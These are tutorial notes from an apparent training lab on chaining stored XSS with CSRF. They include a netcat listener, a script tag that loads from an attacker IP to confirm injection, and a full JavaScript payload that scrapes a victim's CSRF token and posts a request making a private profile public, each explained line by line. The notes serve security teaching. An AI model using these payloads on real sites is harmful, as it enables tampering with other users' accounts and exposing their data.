# XSS & CSRF Chaining
Sometimes, even if we manage to bypass CSRF protections, we may not be able to create cross-site requests due to some sort of same origin/same site restriction. If this is the case, we can try chaining vulnerabilities to get the end result of CSRF.

We will leverage the stored XSS vulnerability to issue a state-changing request against the web application. A request through XSS will bypass any same origin/same site protection since it will derive from the same domain!

We can first check if the fields are vulnerable to XSS that will request a file:

First by starting a listener:
```bash
nc -nvlp 9001
```

Then submitting the following payload:
```javascript
<script src=http://10.10.15.243:9001/TelephoneField></script>
```

Once we save it, then go the page that will bring up the payload, if we get a request sent for 'TelephoneField', we know it is vulnerable.
## Example
Let us target the _Change Visibility_ request because a successful CSRF attack targeting _Change Visibility_ can cause the disclosure of a private profile. (From private to public)
### Payload
Let us focus on the payload we should specify in the _Country_ field (XSS vulnerable field) of Ela Stienen's profile to successfully execute a CSRF attack that will change the victim's visibility settings (From private to public and vice versa):
```javascript
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/app/change-visibility',true);
req.send();
function handleResponse(d) {
    var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/app/change-visibility', true);
    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    changeReq.send('csrf='+token+'&action=change');
};
</script>
```
- Firstly we put the entire script in `<script>` tags, so it gets executed as valid JavaScript.

```javascript
var req = new XMLHttpRequest();
```
- The script snippet above creates an ObjectVariable called _req_, which we will be using to generate a request. _var req = new XMLHttpRequest();_ is allowing us to get ready to send HTTP requests.

```javascript
req.onload = handleResponse;
```
- The _onload_ event handler, which will perform an action once the page has been loaded. This action will be related to the _handleResponse_ function that we will define later.

```javascript
req.open('get','/app/change-visibility',true);
```
- We pass three arguments. _get_ which is the request method, the targeted path _/app/change-visibility_ and then _true_ which will continue the execution.

```javascript
req.send();
```
- Sends everything we constructed in the HTTP request.

```javascript
function handleResponse(d) {
    ...
};
```
- The script snippet above defines a function called _handleResponse_.

```javascript
var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];
```
- Defines a variable called _token_, which gets the value of _responseText_ from the page we specified earlier in our request. 
- `/name="csrf" type="hidden" value="(\w+)"/)[1];` looks for a hidden input field called _csrf_ and \w+ matches one or more alphanumeric characters.

In some cases, this may be different, so let us look at how you can identify the name of a hidden value or check if it is actually "CSRF".
- Open Developer Tools, navigate to the Inspector, and *search* for `csrf`

```javascript
var changeReq = new XMLHttpRequest();
   ...
```
- The script snippet above constructs the HTTP request that we will send through a [XMLHttpRequest](https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/) object.

```javascript
changeReq.open('post', '/app/change-visibility', true);
```
- We change the method from GET to POST.

```javascript
changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
```
- The script snippet above is setting the Content-Type to _application/x-www-form-urlencoded_.

```javascript
changeReq.send('csrf='+token+'&action=change');
```
- Sends the request with one param called _csrf_ having the value of the _token_ variable, which is essentially the victim's CSRF token, and another parameter called _action_ with the value _change_. 
- These are the two parameters that we noticed while inspecting the targeted request through Burp.
### Execution
First, submit the full payload to the _Country_ field (XSS vulnerable field) of Ela Stienen's profile and click "Save".

Open a `New Private Window`, navigate to `http://minilab.htb.net` again and log in to the application.
- This is a user that has its profile "private." No "Share" functionality exists.

Open a new tab and browse Ela Stienen's public profile by navigating to the link below.
`http://minilab.htb.net/profile?email=ela.stienen@example.com`

Now, if you go back to the victim's usual profile page and refresh/reload the page, you should see that his profile became "public".

# NOTE!
Same Origin Policy cannot prevent an attacker from changing the visibility of other users profiles.